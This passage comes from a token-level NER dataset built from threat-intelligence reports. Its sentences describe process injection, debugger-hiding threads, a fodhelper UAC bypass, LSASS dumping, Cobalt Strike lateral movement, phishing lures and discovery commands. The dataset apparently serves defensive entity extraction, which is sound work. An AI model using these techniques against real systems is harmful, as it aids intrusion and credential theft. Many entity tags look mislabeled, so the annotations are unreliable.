"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "launch", - "the", - "shellcode,", - "the", - "loader", - "calls", - "ZwCreateThreadEx", - "to", - "create", - "a", - "new", - "suspended", - "injection", - "thread", - "hidden", - "from", - "debuggers", - "using", - "the", - "THREAD_CREATE_FLAGS_CREATE_SUSPENDED", - "(0x01)", - "and", - "THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER", - "(0x4)", - "thread", - "creation", - "flags." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "redirecting", - "calls", - "to", - "the", - "Windows", - "Sleep", - "API", - "to", - "its", - "own", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "communicates", - "with", - "the", - "C2", - "server", - "specified", - "in", - "the", - "configuration", - "via", - "HTTP", - "or", - "HTTPS", - "POST", - "requests" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shared", - "with", - "the", - "C2", - "server", - "on", - "the", - "initial", - "check-in", - "request", - "(Figure", - "11)", - "for", - "encrypting", - "subsequent", - "data", - "communicated", - "between", - "the", - "agent", - "and", - "C2", - "server", - "with", - "AES-256-CTR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "execution", - "of", - "the", - "downloaded", - "DLL", - "via", - "the", - "tool", - "rundll32.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "performs", - "the", - "download", - "of", - "a", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "script", - "that", - "downloads", - "and", - "executes", - "a", - "dropper" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "downloads", - "a", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "dynamically", - "calls", - "the", - "API", - "NtAllocateVirtualMemory" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "AES", - "Cryptographic", - "Provider", - "from", - "WinCrypt", - "APIs" - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-SecTeam", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "API", - "Web", - "RESTful", - "that", - "provides", - "access", - "to", - "Microsoft", - "Cloud", - "service", - "resources." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "Microsoft", - "Graph", - "API" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "the", - "Microsoft", - "Graph", - "API" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "using", - "the", - "RSA" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "malware", - "proceeds", - "to", - "de-obfuscate", - "strings", - "using", - "a", - "XOR", - "loop" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "de-obfuscated", - "strings:" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted", - "through", - "an", - "AES-256-CBCdecryption", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "decrypted" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "content" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "code", - "in", - "the", - "injected", - "PE" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "in", - "itself", - "a", - "new", - "PE", - "(Portable", - "Executable)", - "file," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "the", - "execution", - "to", - "the", - "region", - "of", - "memory", - "in", - "which", - "the", - "copied", - "PE", - "is", - "allocated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "imported", - "code", - "dynamically", - "calls", - "VirtualAlloc", - "to", - "allocate", - "a", - "new", - "region", - "of", - "memory", - "in", - "which", - "a", - "new", - "PE", - "file", - "is", - "copied." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "full", - "HTTP", - "request", - "to", - "make", - "the", - "first", - "connection", - "to", - "the", - "C&C" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "enumerating", - "the", - "child", - "files", - "in", - "the", - "check", - "OneDrive", - "subdirectory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "execution", - "triggers", - "the", - "setting", - "of", - "the", - "following", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "triggered", - "when", - "the", - "user", - "starts", - "the", - "presentation", - "mode", - "and", - "moves", - "the", - "mouse" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "triggered", - "when", - "the", - "user", - "starts", - "the", - "presentation", - "mode", - "and", - "moves", - "the", - "mouse" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "new", - "file,", - "again", - "with", - "a", - "JPEG", - "extension" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Contents", - "of", - "the", - ".img", - "file,", - "including", - "the", - "hidden", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hiding", - "the", - "rest", - "of", - "its", - "files", - "from", - "the", - "user." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "run", - "the", - "subsequent", - "BAT", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "attacker’s", - "BAT", - "file", - "to", - "run" - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "BAT", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "BAT", - "file", - "(4.2)", - "to", - "be", - "run", - "on", - "logon", - "as", - "another", - "UI", - "shell" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "another", - "BAT", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "variants", - "used", - "a", - "known", - "UAC", - "bypass", - "method", - "abusing", - "the", - "legitimate", - "fodhelper.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "UAC", - "bypass", - "implementation" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "it", - "fails,", - "it", - "sets", - "in", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Register", - "a", - "new", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "new", - "service", - "that", - "will", - "run", - "its", - "VBS", - "script", - "(4.1)", - "using", - "sc.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "malicious", - "executable", - "to", - "unpack", - "itself." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "unpacked", - "only", - "when", - "run", - "with", - "a", - "unique", - "password,", - "allow", - "evading", - "traditional", - "signature-based", - "detection." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypting", - "and", - "running", - "the", - "ransomware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "user", - "is", - "then", - "prompted", - "to", - "open", - "the", - "single", - "visible", - "shortcut", - "(2)", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "obfuscated", - "VBA", - "scripts", - "or", - "a", - "binary", - "with", - "a", - "JPG", - "extension" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "trick", - "users", - "into", - "opening", - "the", - "malicious", - "attachments", - "in" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "If", - "a", - "target", - "opens", - "the", - "malicious", - "attachment," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "three", - "possible", - "types", - "of", - "messages", - "to", - "try", - "to", - "get", - "a", - "target", - "to", - "open", - "the", - "email", - "and", - "malicious", - "attachment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp" - ] - }, - { - "tokens": [ - "The", - "attachment,", - "if", - "opened," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spear", - "phishing", - "emails", - "pretending", - "to", - "be", - "from", - "financial", - "vendors", - "or", - "partners", - "to", - "trick", - "users", - "into", - "opening", - "the", - "malicious", - "attachments", - "in", - "the", - "emails." - ], - "ner_tags": [ - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "a", - "malicious", - "attachment", - "sent", - "via", - "phishing", - "emails" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way" - ] - }, - { - "tokens": [ - "the", - "malicious", - "attachment," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "email", - "and", - "malicious", - "attachment." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "emails", - "pretending", - "to", - "be", - "related", - "to", - "a", - "shipment", - "notice", - "for", - "the", - "target", - "which", - "contain", - "a", - "malicious", - "attachment." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Both", - "send", - "information", - "to", - "command", - "and", - "control", - "(C2)", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogging", - "every", - "tap" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtain", - "logs", - "of", - "the", - "infected", - "machine’s", - "keystrokes" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrate", - "data", - "from", - "messaging", - "applications", - "such", - "as", - "WhatsApp", - "and", - "Viber" - ], - "ner_tags": [ - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "malware", - "can", - "deliver", - "payloads", - "from", - "the", - "command", - "and", - "control", - "(C2)", - "server" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "vulnerability", - "allows", - "for", - "a", - "threat", - "actor", - "to", - "obtain", - "system", - "privileges" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "take", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "version", - "of", - "CEIDPageLock", - "has", - "VMProtect,", - "which", - "makes", - "analysis", - "and", - "unpacking", - "difficult" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "proceeded", - "to", - "dump", - "credentials", - "from", - "LSASS." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "again", - "used", - "Get-System", - "to", - "elevate", - "and", - "then", - "dumped", - "LSASS." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "beacons", - "accessing", - "LSASS", - "on", - "multiple", - "occasions,", - "on", - "almost", - "every", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actor", - "injected", - "into", - "a", - "dllhost.exe", - "process" - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "which", - "is", - "then", - "injected", - "into", - "svchost", - "and", - "dllhost." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Process", - "injection", - "was", - "observed", - "during", - "the", - "intrusion" - ], - "ner_tags": [ - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "direct", - "Cobalt", - "Strike", - "processes", - "and", - "the", - "injected", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injecting", - "into", - "multiple", - "other", - "processes,", - "such", - "as", - "explorer.exe", - "and", - "svchost.exe,", - "to", - "execute", - "further", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "dumped", - "from", - "an", - "injection", - "into", - "the", - "SearchIndexer", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "was", - "achieved", - "by", - "transferring", - "a", - "Cobalt", - "Strike", - "DLL", - "over", - "SMB" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "SMB", - "lateral", - "transfer", - "of", - "one", - "of", - "the", - "Atera", - "Agent", - "MSI", - "installers", - "(1.msi)", - "used", - "to", - "gain", - "access", - "laterally", - "on", - "a", - "host", - "and", - "provide", - "persistence", - "for", - "later", - "access." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMB", - "to", - "transfer", - "DLL's", - "into", - "the", - "ProgramData", - "folder", - "of", - "hosts", - "for", - "purposes", - "of", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "executing", - "via", - "a", - "remote", - "service", - "on", - "another", - "workstation." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "batch", - "file", - "named", - "find.bat." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Windows", - "discovery", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "a", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "batch", - "script" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "basic", - "discovery", - "tasks", - "on", - "the", - "host", - "using", - "built", - "in", - "Windows", - "utilities." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "the", - "find.bat", - "batch", - "script." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "was", - "then", - "fed", - "to", - "a", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file", - "contained", - "one", - "line," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "began", - "enumerating", - "the", - "network", - "using", - "native", - "Windows", - "binaries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "the", - "interactive", - "shell" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wrote", - "a", - "registry", - "run", - "key", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "a", - "registry", - "run", - "key", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "systeminfo" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "systeminfo" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ipconfig" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "ipconfig", - "/all" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "sending", - "new", - "emails", - "with", - "attached", - "xls", - "and", - "zip", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "document", - "came", - "in", - "via", - "email", - "in", - "the", - "form", - "of", - "a", - "zip", - "file", - "which", - "included", - "an", - "xls", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "emails", - "were", - "sent", - "through", - "various", - "compromised", - "email", - "accounts,", - "propagating", - "additional", - "malicious", - "xls", - "files" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "the", - "remote", - "admin", - "tools" - ], - "ner_tags": [ - "O", - "O", - "I-Tool", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "deployed", - "several", - "Atera/Splashtop", - "remote", - "access", - "tools", - "across", - "the", - "environment", - "as", - "an", - "alternative", - "means", - "of", - "access", - "to", - "the", - "environment" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actors", - "used", - "Atera", - "and", - "Splashtop", - "remote", - "access", - "tools", - "on", - "two", - "compromised", - "hosts", - "during", - "the", - "intrusion." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "after", - "a", - "user", - "opened", - "an", - "Excel", - "document", - "and", - "enabled", - "macros." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "deobfuscate", - "the", - "document", - "the", - "tool", - "xlmdeobfuscator", - "was", - "used", - "with", - "the", - "following", - "output." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "deobfuscation" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "process", - "hollowing", - "to", - "launch", - "under", - "the", - "context", - "of", - "the", - "Dllhost.exe", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "the", - "following", - "URLs", - "are", - "hard", - "coded,", - "and", - "obfuscated" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "the", - "second", - "stage." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "pulled", - "down", - "and", - "executed", - "a", - "Cobalt", - "Strike", - "payload", - "on" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "ran", - "another", - "round", - "of", - "discovery", - "activity", - "with", - "native", - "windows", - "utilities" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "“C:\\Windows\\System32\\cmd.exe”", - "CommandLine:", - "“C:\\Windows\\system32\\cmd.exe", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "gpupdate" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "gpupdate" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "gpupdate" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C:\\Windows\\system32\\cmd.exe", - "/C", - "gpupdate" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "whoami.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd.exe", - "/C", - "whoami" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "continued", - "by", - "moving", - "laterally", - "to", - "the", - "domain", - "controllers", - "on", - "the", - "network", - "using", - "SMB", - "to", - "transfer", - "and", - "execute", - "a", - "Cobalt", - "Strike", - "Beacon" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "used", - "PsExec,", - "to", - "copy", - "and", - "execute", - "a", - "Cobalt", - "Strike", - "Beacon", - "DLL", - "on", - "most", - "of", - "the", - "systems", - "in", - "the", - "network." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "utilized", - "RDP," - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "was", - "seen", - "establishing", - "RDP", - "connections" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "was", - "used", - "to", - "enable", - "RDP," - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "remotedesktop", - "mode", - "=", - "enable", - "cmd" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDP", - "connections", - "were", - "established", - "from", - "the", - "beachhead", - "host", - "to", - "systems", - "throughout", - "the", - "environment" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "details", - "of", - "the", - "RDP", - "session" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "the", - "initial", - "vector", - "used", - "by", - "the", - "threat", - "actor", - "was", - "a", - "zip", - "file,", - "which", - "included", - "a", - "malicious", - "JavaScript", - "file,", - "delivered", - "through", - "a", - "phishing", - "campaign." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "This", - "RDP", - "activity", - "was", - "being", - "proxied", - "through", - "the", - "IcedID", - "process", - "running", - "on", - "that", - "host,", - "to", - "a", - "remote", - "proxy", - "over", - "port", - "8080." - ], - "ner_tags": [ - "O", - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "in", - "an", - "effort", - "to", - "evade", - "any", - "detection", - "and", - "prevention", - "mechanisms,", - "they", - "disabled", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - 